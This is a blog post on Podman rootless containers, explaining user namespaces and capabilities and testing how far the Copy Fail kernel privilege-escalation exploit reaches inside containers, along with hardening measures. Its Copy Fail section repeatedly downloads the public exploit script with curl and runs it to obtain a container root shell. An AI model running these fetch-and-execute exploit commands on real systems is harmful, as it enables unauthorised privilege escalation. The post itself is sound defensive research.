Podman rootless containers and the Copy Fail exploit

Source: garrido.io
41 points by ggpsv a day ago on lobsters | 15 comments

Contents

On April 29th CVE-2026-31431 was publicly disclosed at https://copy.fail/. This vulnerability allows a local unprivileged user to obtain a root shell by running the Python script shared by the author.

This exploit can be used to exploit Linux containers, which are widely used to run all sorts of things: public-facing services, development environments, continuous integration jobs, etc. A container exploited with Copy Fail can used quite effectively for many kinds of attacks.


This CVE is quite interesting to me as it’s been about a year since I moved away from Docker to Podman to run containers. Several reasons motivated this change, but chief among them was Podman’s security posture 1.

Podman makes it trivial to run containers as an unprivileged user, and this is known as running a container “rootless”. Unlike Docker, Podman uses a fork/exec model such that the container process is ultimately a descendant of the podman run process that is used to run the container. As a result, you can rely on standard UID separation to isolate your container processes from root or other users in the system.

As I read about Copy Fail I did not find much information about its use in rootless containers specifically. After performing some simple tests I confirmed that Copy Fail is indeed exploitable in rootless containers to obtain a container root shell, but the blast radius of this is severaly limited using several features in Podman.

At the time of publishing, there is not a lot of information about container escapes:

Root cause, scatterlist diagrams, the 2011 → 2015 → 2017 history, and the exploit walkthrough are on the Xint blog. Part 2 (Kubernetes container escape) is forthcoming.

In my testing, the container root is still limited to what the unprivileged user running the container can do at the host level.

All in all, Copy Fail has proven to be a great example to refer to when writing about Podman’s implementation of rootless containers. In this note I reproduce the exploit across distinct container configurations to try to understand the exposure of a compromised rootless container.

This article ended up being a bit long so feel free to jump ahead to the relevant parts if you need to:

  1. A practical review of rootless containers, user namespaces and Linux capabilities
  2. Using Copy Fail in rootless containers
  3. Practicing defence in depth to further limit exposure in the event of a compromise

An overview of rootless containers

Let’s assume that I need to run an HTTP server to serve some HTML. The server will run in a container owned by an unprivileged user bar whose UID is 1001.

I install Podman, create the user bar, and switch to it. Then, I build the image using podman build and run the container using podman run:

root@debian:~# apt install -y podman
root@debian:~# useradd -m -d /var/lib/bar -s /bin/bash -u 1001 bar
root@debian:~# su - bar
bar@debian:~$ cat > Containerfile <<EOF
FROM ubuntu:latest

RUN apt update && apt install -y python3 && apt clean

RUN mkdir -p /var/www/html
WORKDIR /var/www/html

RUN cat > index.html <<HTML
<!DOCTYPE html><html lang="en"></html>
HTML

EXPOSE 8000
CMD ["python3", "-m", "http.server", "-b", "0.0.0.0", "8000"]
EOF
bar@debian:~$ podman build -t http-server .
bar@debian:~$ podman run --rm -it --name http-server-1 -d -p 127.0.0.1:8000:8000/tcp localhost/http-server:latest

The server should now be responding to requests:

bar@debian:~$ curl localhost:8000
<!DOCTYPE html><html lang="en"></html>

Rootless rootful

Let’s examine what this container process looks like. Using ps I can confirm that this python3 process is owned by the user bar:

root@debian:~# ps -fC python3
UID          PID    PPID  C STIME TTY          TIME CMD
bar         4861    4859  0 19:26 pts/0    00:00:00 python3 -m http.server -b 0.0.0.0 8000

As mentioned in the introduction, Podman uses a fork/exec model to run containers. User bar executed the podman run command, and the container command python3 descended from that process. This is in contrast to the standard Docker setup, in which running docker run as an unprivileged user executes a Docker client that interacts with a rootful daemon that ultimately spawns the container:

bar@debian:~$ docker run --rm -it -d --name http-server-1 http-server
bar@debian:~$ ps -fC python3
UID          PID    PPID  C STIME TTY          TIME CMD
root        5198    5175  5 19:20 pts/0    00:00:00 python3 -m http.server -b 0.0.0.0 8000
bar@debian:~$ docker container top http-server-1
UID                 PID                 PPID                C                   STIME               TTY                 TIME                CMD
root                4844                4820                0                   14:51               pts/0               00:00:00            python3 -m http.server -b 0.0.0.0 8000

Now, containers also have users and groups to determine permissions inside the container. Most images default to running the container commands as root in the absence of an explicit USER instruction in the Containerfile or a --user flag when running the container.

Using podman top I can confirm that the python3 container process is running as root as I did not declare which user executes the process:

bar@debian:~$ podman top http-server-1 huser,user,pid,args
HUSER       USER        PID         COMMAND
1001        root        1           python3 -m http.server -b 0.0.0.0 8000 

Remember that containers share the kernel with the host. What does being root inside the container mean? Surely this is not the same as host root given that we’re using an unprivileged user?

User namespaces

Podman uses user namespaces for rootless containers. User namespaces allow processes to have different a UID/GID inside and outside the container. In our previous example, the python3 process has a UID of 0 (i.e container root) inside the namespace while being mapped to UID 1001 (i.e host bar) outside it.

The range of UIDs that can be allocated to namespaced processes of user bar is determined in /etc/subuid:

bar@debian:~$ grep bar /etc/subuid
bar:165536:65536

Besides UID 1001, there are 65,537 UIDs can be allocated to processes of bar, starting with 165536 and ending with 231072 (165536 + 65537).

Our current image is based off of ubuntu, which brings its own set of users:

bar@debian:~$ podman run --rm -it --name http-server-1 localhost/http-server:latest cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash

Processes and objects from these users have the UIDs shown above within the bar user namespace. Outside the namespace these are mapped to a UID within the 165537-231072 range, with the exception of root which is mapped to host UID 1001.

For example, let’s have bar run sleep in the container as user www-data:

bar@debian:~$ podman run --rm -it -d --name http-server-1 --user=www-data localhost/http-server:latest sleep 60
bar@debian:~$ podman top http-server-1 huser,user,args
HUSER       USER        COMMAND
165568      www-data    sleep 60 

The sleep process is running as www-data inside the user namespace but is mapped to 165568 on the host. The user namespace affords standard UID isolation across processes of the same user. That is to say, from the host’s perspective, a process of www-data in the bar user namespace is separate from one of bar.

Docker does support using user namespaces, but it must be configured accordingly and only one user namespace is allowed. With Podman, each UNIX user has its rootless containers running in the corresponding user namespace.

You can use podman unshare to enter the user’s namespace without having to run a container. We can use this to understand the relationship between bar and the namespace root by comparing the ownership of bar’s home directory, both inside and outside the namespace:

bar@debian:~$ ls -ld $HOME
drwx------ 5 bar bar 4096 May  2 22:58 /var/lib/bar
bar@debian:~$ podman unshare ls -ld $HOME
drwx------ 5 root root 4096 May  2 22:58 /var/lib/bar

The last thing to understand about the container root is privileges. Per the Containerfile that we’re using, root was able to install python3 in the container using apt install. How was this possible given that installing packages involves multiple privileged operations and bar is not the host root?

Privileged operations

Podman uses Linux capabilities to grant granular root privileges to a container process. You can drop or add these capabilities both when building the image and running the container.

By using pscap we can observe that multiple capabilities are granted to the apt processes that runs during the image build for user bar:

root@debian:~# pscap
ppid  pid   uid         command             capabilities
10941 11272 bar         apt *               chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, sys_chroot, setfcap +

These capabilities are set by Podman and it is the combination of these what allows root in the namespace to perform privileged operations. Should we drop all capabilities during podman build using --cap-drop=all, the image will fail to build due to lack of permissions:

bar@debian:~$ podman build -t http-server --cap-drop=all --no-cache .
STEP 1/7: FROM ubuntu:latest
STEP 2/7: RUN apt update &&         apt install -y python3 &&         apt clean

WARNING: apt does not have a stable CLI interface. Use with caution in scripts.

E: setgroups 65534 failed - setgroups (1: Operation not permitted)
E: setegid 65534 failed - setegid (1: Operation not permitted)
E: seteuid 42 failed - seteuid (1: Operation not permitted)
E: setgroups 0 failed - setgroups (1: Operation not permitted)
Reading package lists...
W: chown to _apt:root of directory /var/lib/apt/lists/partial failed - SetupAPTPartialDirectory (1: Operation not permitted)
W: chown to _apt:root of directory /var/lib/apt/lists/auxfiles failed - SetupAPTPartialDirectory (1: Operation not permitted)
E: setgroups 65534 failed - setgroups (1: Operation not permitted)
E: setegid 65534 failed - setegid (1: Operation not permitted)
E: seteuid 42 failed - seteuid (1: Operation not permitted)
E: setgroups 0 failed - setgroups (1: Operation not permitted)
E: Method gave invalid 400 URI Failure message: Failed to setgroups - setgroups (1: Operation not permitted)
E: Method http has died unexpectedly!
E: Sub-process http returned an error code (112)
Error: building at STEP "RUN apt update &&         apt install -y python3 &&         apt clean": while running runtime: exit status 100

We certainly need the privileges in this case so we can either use the default set for root, or drop all capabilities and then set the ones that are necessary to install packages:

bar@debian:~$ podman build -t http-server --cap-drop=all --cap-add=CAP_SETUID,CAP_SETGID,CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER --no-cache .

Knowing this, we can go back and review the capabilities granted to the python3 process behind our HTTP server:

bar@debian:~$ podman run --rm -it -d --name http-server-1 -p 127.0.0.1:8000:8000/tcp localhost/http-server:latest
bar@debian:~$ podman top http-server-1 user,capeff,args
USER        EFFECTIVE CAPS                                                                                   COMMAND
root        CHOWN,DAC_OVERRIDE,FOWNER,FSETID,KILL,NET_BIND_SERVICE,SETFCAP,SETGID,SETPCAP,SETUID,SYS_CHROOT  python3 -m http.server -b 0.0.0.0 8000 

Our HTTP server is running as root with a lot of capabilities that it doesn’t need. That is quite the surface area to exploit in the event that the container process is compromised2.

We can improve the situation by dropping all capabilities when starting the container:


bar@debian:~$ podman run --rm -it -d --name http-server-1 -p 127.0.0.1:8000:8000/tcp --cap-drop=all localhost/http-server:latest
bar@debian:~$ podman top http-server-1 user,capeff,argsUSER        EFFECTIVE CAPS  COMMAND
root        none            python3 -m http.server -b 0.0.0.0 8000 

Much better! Yet, we can go further. Even without capabilities, root can still modify all the files that it owns. There is no need for our server to run under root, so lets have an unprivileged user do it.

Rootless non-root

To run our HTTP server as an unprivileged user within the container we can either inspect the base image’s /etc/passwd file and choose an existing user (e.g www-data), or create our own during the image build. In my case I prefer to use a dedicated foo user with UID 1002 that has read-only access to the served files:

FROM ubuntu:latest

RUN apt update && apt install -y python3 && apt clean

RUN mkdir -p /var/www/html
+ RUN groupadd -g 1002 foo
+ RUN useradd -s /bin/bash -g 1002 -u 1002 foo
+ RUN chown root:foo /var/www/html
WORKDIR /var/www/html

RUN cat > index.html <<HTML
<!DOCTYPE html><html lang="en"></html>
HTML

+ USER foo:foo
EXPOSE 8000
CMD ["python3", "-m", "http.server", "-b", "0.0.0.0", "8000"]

Once again I build and run the container. Note that I don’t need to specify the user explicitly when I run podman run because the USER foo:foo instruction in the Containerfile sets that UID for all processes thereafter.

bar@debian:~$ podman run --rm -it -d --name http-server-1 -p 127.0.0.1:8000:8000/tcp --cap-drop=all localhost/http-server:latest
bar@debian:~$ podman top http-server-1 huser,user,capeff,args
HUSER       USER        EFFECTIVE CAPS  COMMAND
166537      foo         none            python3 -m http.server -b 0.0.0.0 8000 

All good! Our server is running as user foo inside the container, mapped to UID 166537 on the host, and without any capabilities.

Container processes should run with the least amount of privileges, only adding them as necessary. For example, if we wanted to have python3 bind to privileged port 80 while running as foo, we would have to grant the NET_BIND_SERVICE capability using --cap-add=CAP_NET_BIND_SERVICE during podman run.

To conclude, there are four ways in which our container could possibly be configured to run:

Host userContainer userTerm
rootrootroot rootful
rootunprivilegedroot non-root
unprivilegedrootrootless rootful
unprivilegedunprivilegedrootless non-root

Podman makes it trivial to run a rootless rootful container, and rather easy to run a rootless non-root container as long as you can execute the container’s process as an unprivileged user. The latter typically requires more familiarity with how the container image is built.

Bind mounts

Before moving on to Copy Fail, let’s review what we’ve seen so far with the concept of bind mounts.

We will mount a host directory into the container, and this directory will have files owned by the host root, host bar, and namespaced foo. These files will be readable only by their respective user and group, but the directory will be writable by anyone so that the container user can create its file:

root@debian:~# mkdir /var/lib/bar/test
root@debian:~# chown bar:bar /var/lib/bar/test
root@debian:~# chmod 0777 /var/lib/bar/test
root@debian:~# echo 'I am root' > /var/lib/bar/test/root.txt
root@debian:~# su - bar
bar@debian:~$ echo 'I am bar' > test/bar.txt
bar@debian:~$ exit
root@debian:~# chmod u=rw,g=r,o= /var/lib/bar/test/*.txt
root@debian:~# ls -l /var/lib/bar/test
total 8
-rw-r----- 1 bar  bar   9 May  4 14:40 bar.txt
-rw-r----- 1 root root 10 May  4 14:40 root.txt

Now, let’s mount this directory into the container, run it as foo, and try to read the contents:

bar@debian:~$ podman run --rm -it --name http-server-1 -v ./test:/test:rw localhost/http-server:latest /bin/bash
foo@d1c30d4bfe95:/var/www/html$ ls -l /test
total 8
-rw-r----- 1 root   root     9 May  4 14:40 bar.txt
-rw-r----- 1 nobody nogroup 10 May  4 14:40 root.txt
foo@d1c30d4bfe95:/var/www/html$ cat /test/*.txt
cat: /test/bar.txt: Permission denied
cat: /test/root.txt: Permission denied
foo@d1c30d4bfe95:/var/www/html$ 

As expected, the file owned by host bar is shown as owned by root. However, host root is nobody:nogroup because host root is not mapped to any user in the bar user namespace.

Namespaced user foo cannot read any of these mounted files. Hence, using rootless non-root provides further isolation than rootless rootful because the container process cannot access processes or files owned by bar (i.e namespace root).

Now, lets have foo create a file in the bind mount:

foo@a94715fe7fa9:/var/www/html$ echo 'I am foo' > /test/foo.txt
foo@a94715fe7fa9:/var/www/html$ chmod u=rw,g=r,o= /test/foo.txt
foo@a94715fe7fa9:/var/www/html$ ls -l /test
total 12
-rw-r----- 1 root   root     9 May  4 14:40 bar.txt
-rw-r----- 1 foo    foo      9 May  4 14:48 foo.txt
-rw-r----- 1 nobody nogroup 10 May  4 14:40 root.txt

Back on the host, let’s look at the directory that was mounted and try to access the file created by namespaced foo:


bar@debian:~$ ls -l test
total 12
-rw-r----- 1 bar    bar     9 May  4 14:40 bar.txt
-rw-r----- 1 166537 166537  9 May  4 14:48 foo.txt
-rw-r----- 1 root   root   10 May  4 14:40 root.txt
bar@debian:~$ cat test/foo.txt 
cat: test/foo.txt: Permission denied

As expected, the file created by foo is owned by its mapped UID and thus bar cannot read the contents of it.

What about running the container process as user root?

bar@debian:~$ podman run --rm -it --name http-server-1 --user=root -v ./test:/test:rw localhost/http-server:latest /bin/bash
root@7f99bdf6766f:/var/www/html# ls -l /test
total 12
-rw-r----- 1 root   root     9 May  4 14:40 bar.txt
-rw-r----- 1 foo    foo      9 May  4 14:48 foo.txt
-rw-r----- 1 nobody nogroup 10 May  4 14:40 root.txt
root@7f99bdf6766f:/var/www/html# cat /test/*.txt
I am bar
I am foo
cat: /test/root.txt: Permission denied

As expected, namespaced root can read its “own” file and foo’s, but not the one owned by host root. Should we drop the container’s capabilities then root is unable to read foo’s file:

bar@debian:~$ podman run --rm -it --name http-server-1 --user=root --cap-drop=all -v ./test:/test:rw localhost/http-server:latest /bin/bash
root@dbe4cb171f13:/var/www/html# cat /test/*.txt
I am bar
cat: /test/foo.txt: Permission denied
cat: /test/root.txt: Permission denied

Copy Fail

At this point we have a good grasp of how rootless containers rely on user namespaces and UIDs for process isolation, and Linux capabilities to perform privileged operations. Let’s see what we can achieve using Copy Fail in various rootless container configurations.

Note: I am using the version of Copy Fail that was originally published in commit 8e918b5.

We will use our existing HTTP server container to get a sense of how a container can be compromised and what mechanisms we have to limit the blast radius. But first, let’s update our previous Container file so that curl is installed in the container. We will use that download the exploit.

FROM ubuntu:latest

+ RUN apt update && apt install -y python3 curl && apt clean
- RUN apt update && apt install -y python3 && apt clean

RUN mkdir -p /var/www/html
RUN groupadd -g 1002 foo
RUN useradd -s /bin/bash -g 1002 -u 1002 foo
RUN chown root:foo /var/www/html
WORKDIR /var/www/html

RUN cat > index.html <<HTML
<!DOCTYPE html><html lang="en"></html>
HTML

USER foo:foo
EXPOSE 8000
CMD ["python3", "-m", "http.server", "-b", "0.0.0.0", "8000"]

I’ll call this image copyfail:

bar@debian:~$ podman build -t copyfail .

I need to make sure that I am on a kernel that has not yet been patched. I am using Debian, so any recent version below 6.12.85 will do:

bar@debian:~$ uname -r
6.12.74+deb13+1-amd64

Copy Fail affords running su without a password prompt whatsoever, thus obtaining a root shell. Calling su as an unprivileged user will normally prompt for the root password:

bar@debian:~$ podman run --rm -it --name copyfail localhost/copyfail /bin/bash
foo@c0e7377ce040:/var/www/html$ su
Password: 

In each test, the container user will download the Copy Fail script to /tmp and then execute it. If a root shell is obtained, sleep is called. Copy Fail persists across container lifecycles, so this VM is rebooted prior to each test.

Rootless rootful

Let’s go back to running our HTTP server as a rootless rootful container, meaning, the process runs as root inside the container but as unprivileged user bar in the host.

bar@debian:~$ podman run --rm -it --name copyfail --user=root localhost/copyfail /bin/bash
root@4c4dd3eb4e84:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
root@4c4dd3eb4e84:/var/www/html# cd /tmp
root@4c4dd3eb4e84:/tmp# curl -o copy_fail_exp.py https://raw.githubusercontent.com/theori-io/copy-fail-CVE-2026-31431/8e918b538783f64cb812fab3e8a784b0b13c6c94/copy_fail_exp.py
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   732  100   732    0     0   2554      0 --:--:-- --:--:-- --:--:--  2559
root@4c4dd3eb4e84:/tmp# python3 copy_fail_exp.py && su
# id
uid=0(root) gid=0(root) groups=0(root)
# sleep 60

What happened here is what you would normally expect if you’re the root user. root can invoke su to open another root shell, no password is necessary. Here’s the same set of commands without Copy Fail:

bar@debian:~$ podman run --rm -it --name copyfail --user=root localhost/copyfail /bin/bash
root@19f2187d5b57:/var/www/html# su
root@19f2187d5b57:/var/www/html# 

It goes without saying that Copy Fail is not contributing anything in this particular container since we were already root. Looking at our container process we can see that all of the processes are running as root inside the user namespace though still as bar in the host. Also, the exact same of capabilities persist across both shells:

bar@debian:~$ podman top copyfail huser,user,pid,args,capeff
HUSER       USER        PID         COMMAND                    EFFECTIVE CAPS
1001        root        1           /bin/bash                  CHOWN,DAC_OVERRIDE,FOWNER,FSETID,KILL,NET_BIND_SERVICE,SETFCAP,SETGID,SETPCAP,SETUID,SYS_CHROOT
1001        root        6           python3 copy_fail_exp.py   CHOWN,DAC_OVERRIDE,FOWNER,FSETID,KILL,NET_BIND_SERVICE,SETFCAP,SETGID,SETPCAP,SETUID,SYS_CHROOT
1001        root        7           sh -c -- su                CHOWN,DAC_OVERRIDE,FOWNER,FSETID,KILL,NET_BIND_SERVICE,SETFCAP,SETGID,SETPCAP,SETUID,SYS_CHROOT
1001        root        8           [sh]                       CHOWN,DAC_OVERRIDE,FOWNER,FSETID,KILL,NET_BIND_SERVICE,SETFCAP,SETGID,SETPCAP,SETUID,SYS_CHROOT
1001        root        10          sleep 60                   CHOWN,DAC_OVERRIDE,FOWNER,FSETID,KILL,NET_BIND_SERVICE,SETFCAP,SETGID,SETPCAP,SETUID,SYS_CHROOT

Lastly, root cannot read the mounted host file /test/root.txt:

# cat /test/*.txt
I am bar
I am foo
cat: /test/root.txt: Permission denied

Rootless non-root

We know better than running the container process as root, so let’s repeat the exploit using foo.

bar@debian:~$ podman run --rm -it --name copyfail -v ./test:/test:rw localhost/copyfail:latest /bin/bash
foo@ef4c1e6775bd:/var/www/html$ id
uid=1002(foo) gid=1002(foo) groups=1002(foo)
foo@ef4c1e6775bd:/var/www/html$ cd /tmp
foo@ef4c1e6775bd:/tmp$ curl -o copy_fail_exp.py https://raw.githubusercontent.com/theori-io/copy-fail-CVE-2026-31431/8e918b538783f64cb812fab3e8a784b0b13c6c94/copy_fail_exp.py
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   732  100   732    0     0   2227      0 --:--:-- --:--:-- --:--:--  2231
foo@ef4c1e6775bd:/tmp$ python3 copy_fail_exp.py && su
# id
uid=0(root) gid=1002(foo) groups=1002(foo)
# sleep 60

It worked! We were able to escalate from container foo to container root. Looking at the container processes, we can confirm that sleep is running as container root and host bar, and some new capabilities were assumed:

bar@debian:~$ bar@debian:~$ podman top copyfail huser,user,pid,args,capeff
HUSER       USER        PID         COMMAND                    EFFECTIVE CAPS
166537      foo         1           /bin/bash                  none
166537      foo         7           python3 copy_fail_exp.py   none
166537      foo         8           sh -c -- su                none
1001        root        9           [sh]                       CHOWN,DAC_OVERRIDE,FOWNER,FSETID,KILL,NET_BIND_SERVICE,SETFCAP,SETGID,SETPCAP,SETUID,SYS_CHROOT
1001        root        10          sleep 60                   CHOWN,DAC_OVERRIDE,FOWNER,FSETID,KILL,NET_BIND_SERVICE,SETFCAP,SETGID,SETPCAP,SETUID,SYS_CHROOT

Nonetheless, our root cannot yet access the mounted host root file:

# cat /test/*.txt
I am bar
I am foo
cat: /test/root.txt: Permission denied

At this point the container has been compromised and can be leveraged for all sorts of things. We’ve limited the blast radius of the exploit to the container and whatever unprivileged user bar can do on the host.

Is there anything we can do to mitigate the exploit in the first place?

Rootless non-root while disabling new privileges

Podman allows running containers such that the container process cannot gain any additional privileges than the ones it began with.

All we have to do is add --security-opt=no-new-privileges to our podman run command and repeat the exploit:

bar@debian:~$ podman run --rm -it --name copyfail --security-opt=no-new-privileges -v ./test:/test:rw localhost/copyfail:latest /bin/bash
foo@3422d6ffc15a:/var/www/html$ cd /tmp
foo@3422d6ffc15a:/tmp$ curl -o copy_fail_exp.py https://raw.githubusercontent.com/theori-io/copy-fail-CVE-2026-31431/8e918b538783f64cb812fab3e8a784b0b13c6c94/copy_fail_exp.py
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   732  100   732    0     0   2697      0 --:--:-- --:--:-- --:--:--  2701
foo@3422d6ffc15a:/tmp$ python3 copy_fail_exp.py && su
$ id
uid=1002(foo) gid=1002(foo) groups=1002(foo)
$ sleep 60

Interesting! We gained a shell but it is still foo. We can look at the container processes to confirm that the user is still the same one:

bar@debian:~$ podman top copyfail huser,user,pid,args,capeff
HUSER       USER        PID         COMMAND                    EFFECTIVE CAPS
166537      foo         1           /bin/bash                  none
166537      foo         8           python3 copy_fail_exp.py   none
166537      foo         9           sh -c -- su                none
166537      foo         10          [sh]                       none
166537      foo         12          sleep 60                   none

Once again, foo is limited to reading its own file:

$ cat /test/*.txt
cat: /test/bar.txt: Permission denied
I am foo
cat: /test/root.txt: Permission denied

This is much better. The container has been compromised but it’s still running as unprivileged user foo without any capability whatsoever. It is limited to whatever foo can do within the container.

Rootless non-root while dropping capabilities

We saw earlier than we can use --cap-drop=all to drop all capabilities upon starting the container process. Would this impede the exploit somehow, given that foo has no capabilities to begin with?

bar@debian:~$ podman run --rm -it --name copyfail --cap-drop=all -v ./test:/test:rw localhost/copyfail /bin/bash
foo@21e516acea41:/var/www/html$ cd /tmp
foo@21e516acea41:/tmp$ curl -o copy_fail_exp.py https://raw.githubusercontent.com/theori-io/copy-fail-CVE-2026-31431/8e918b538783f64cb812fab3e8a784b0b13c6c94/copy_fail_exp.py
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   732  100   732    0     0   2500      0 --:--:-- --:--:-- --:--:--  2498
foo@21e516acea41:/tmp$ python3 copy_fail_exp.py && su
$ id
uid=1002(foo) gid=1002(foo) groups=1002(foo)
$ sleep 60

Let’s check the container processes:

bar@debian:~$ podman top copyfail huser,user,pid,args,capeff
HUSER       USER        PID         COMMAND                    EFFECTIVE CAPS
166537      foo         1           /bin/bash                  none
166537      foo         6           python3 copy_fail_exp.py   none
166537      foo         7           sh -c -- su                none
166537      foo         8           [sh]                       none
166537      foo         10          sleep 60                   none

Once again, the exploit failed to yield a root shell, and our processes is still without capabilities. foo is also limited to readings its own files:

$ cat /test/*.txt
cat: /test/bar.txt: Permission denied
I am foo
cat: /test/root.txt: Permission denied

This is akin to the result of the previous test, and these two measures can be combined to effectively limit capabilities.

The exploit persists

We’ve limited the immediate effects of the exploit, by way of impeding a root shell with capabilities in the container. Nonetheless, the exploit was still effective.

If I run another container without the capabilities flags, I can assume container root by calling su as the unprivileged container user:

bar@debian:~$ podman run --rm -it --name copyfail -v ./test:/test:rw localhost/copyfail /bin/bash
foo@1eccd04fd2bd:/var/www/html$ su
# id
uid=0(root) gid=1002(foo) groups=1002(foo)

Hence, you should still patch your kernel and reboot.

Defence in depth

All in all, this is quite the exploit. An Remote Code Execution (RCE) vulnerability could be used to run Copy Fail and thus obtain privileged root inside the container, regardless of it being rootless. A compromised container can be used to bootstrap all kinds of attacks.

Fortunately, we are able to limit exposure by dropping capabilities and disabling new privileges upon the container’s start.

We can practice defense-in-depth and apply other tools at our disposal to further limit the exposure to a compromise of this kind.

Read-only images

You can add the --read-only flag to podman run so that the container root filesystem is mounted as read-only. Podman still defaults to mounting some writeable folders directories such as /tmp, /run, /var/tmp. You need to add the --read-only-tmpfs=false flag as well to make the container completely read-only.

No writes to the system would be allowed in the event of a compromise of a read-only container. This would limit certain kinds of attacks post-exploit but not impede the exploit itself as you can still pipe the output of curl to python3.

Now, the ability to use these flags depends on how your container processes work. We can safely use these in our example because our python3 HTTP server does not need to write to the filesystem. However, most pre-built images out there assume write access to certain directories and may fail to work correctly in a read-only root filesystem.

It should be noted that the read-only root filesystem is independent of any writeable volumes that you attach to the container. That directory can be written to in the event of a compromise.


bar@debian:~$ podman run --rm -it --name copyfail --read-only --read-only-tmpfs=false -v ./test:/test:rw localhost/copyfail:latest /bin/bash
foo@be21db39a7fb:/var/www/html$ touch /test/foo2.txt
foo@be21db39a7fb:/var/www/html$ touch /tmp/test.txt
touch: cannot touch '/tmp/test.txt': Read-only file system
foo@be21db39a7fb:/var/www/html$ touch $HOME/test.txt
touch: cannot touch '/var/lib/foo/test.txt': Read-only file system

Resource constraints

Both Docker and Podman support limiting resources available to containers using cgroups. Containers don’t need unlimited memory, CPU, or PIDs. You can examine you container’s resource usage using podman stats and then apply limits accordingly.

Limit available binaries

We based our container image off of ubuntu to keep this exercise simple. The ubuntu image includes a lot of binaries that are available to an attacker in the event of a compromise. These binaries, however, are not necessary to run our humble HTTP server.

You should consider running an image that is as slim as possible as runtime. We could have used a multi-stage build to separate the container’s build-time and runtime environments. Alternatively, we could base off of smaller purpose-built images such as the python3 image, or a use an overall leaner distribution such as -slim variations of Debian or even alpine.

Lastly, so long it is compatible with your container process, you could go even further and use distroless images or scratch for a runtime without shells, package managers, and system utilities.

Firewalling

You can easily firewall off the container’s process using iptables or nftables. Limit incoming and outgoing connections to only what’s strictly necessary for the container process. In our HTTP example, we don’t need DNS nor connecting to any local or remote server so why not limit tcp packets to only those from an established incoming connection.

Conclusion

I hope this proves to be an adequate overview of Podman rootless containers, and how these can be used to limit the exposure in the event of a container compromise in the hands of exploits such as Copy Fail. As stated, rootless containers are not immune to this exploit, but can and should be configured in such a way that curtails subsequent attacks.

At this point it should be clear that a standard Podman rootless container provides better isolation affordances than a standard Docker container setup. While Docker can be configured to run rootless and to use an unprivileged user namespace, it involves significant more effort to do so than using Podman, due in part to a fundamental difference in its architecture.

Docker remains a quite popular choice to run containers, and many tools in the self-hosting ecosystem (e.g Dokku, Kamal, Coolify, Dokploy) default to using to it. I suspect that a lot of services out there are running with a broader attack surface area than is actually necessary by way of running images off of Docker hub without scrutinizing the underlying image and taking measures to lock it down. Hopefully, this article inspires some to try rootless Podman or at least improve their Docker setups.

Ultimately, this highlights the importance of understanding the implementation details of the image that your container runs. You should know which user or users run the container processes, what directories of the root filesystem they depend on, and which Linux capabilities (or lackthereof) they need to deliver on their promise. Knowing these details, you can use and combine several mechanisms afforded by Podman and containers at large to harden the container and limit the blast radius if compromised.

Nonetheless, it is worth reiterating that, depending on your workloads, you should not depend on containers as the sole security boundary. You can combine containers and separate machines (virtual or physical) to great effect. That said, Podman does provide a way to isolate workloads within the same host by running each as discrete unprivileged users, each with their own user namespace.

I will publish an update if I come across more information about Copy Fail that is specific to the topics discussed in here. I’d be glad to receive any feedback, particularly if you noticed an omission or error on my part.

Further reading